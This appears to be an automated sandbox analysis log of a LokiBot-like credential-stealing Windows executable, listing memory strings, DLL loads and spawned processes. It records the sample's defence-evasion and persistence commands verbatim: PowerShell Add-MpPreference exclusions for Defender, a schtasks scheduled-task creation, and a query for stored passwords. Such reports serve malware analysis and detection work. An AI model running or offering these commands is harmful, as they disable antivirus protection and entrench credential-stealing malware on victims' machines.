                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2268891824.0000000007580000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameflaggiest.exe vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2267554201.0000000005600000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameflaggiest.exe vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3403613356.0000000000447000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameflaggiest.exe vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exeBinary or memory string: OriginalFilenameIsyl.exe> vs oS6KsQIqJxe038Y.exe
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: XgbXowhljC.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, vaPwDR8wrxM670fQud.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, u2hrBWS7a8s3GxO9MO.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, u2hrBWS7a8s3GxO9MO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, u2hrBWS7a8s3GxO9MO.csSecurity API names: _0020.AddAccessRule
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3403613356.0000000000447000.00000040.00000400.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: (K@*\AC:\Users\ik\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                    Source: oS6KsQIqJxe038Y.exe, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: D*\AC:\Users\ik\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/52@3/2
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile created: C:\Users\user\AppData\Roaming\XgbXowhljC.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_03
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF214.tmpJump to behavior
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: oS6KsQIqJxe038Y.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: oS6KsQIqJxe038Y.exeBinary or memory string: SELECT item1 FROM metadata WHERE id = 'password';
                    Source: LogganchedTSADAsTxnerPUZbggalesaurus.14.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: oS6KsQIqJxe038Y.exeReversingLabs: Detection: 65%
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile read: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\XgbXowhljC.exe C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess created: C:\Users\user\AppData\Roaming\XgbXowhljC.exe "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp"
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess created: C:\Users\user\AppData\Roaming\XgbXowhljC.exe "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: msvbvm60.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: vb6zz.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: winsqlite3.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: zipfldr.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeSection loaded: msxml3.dllJump to behavior
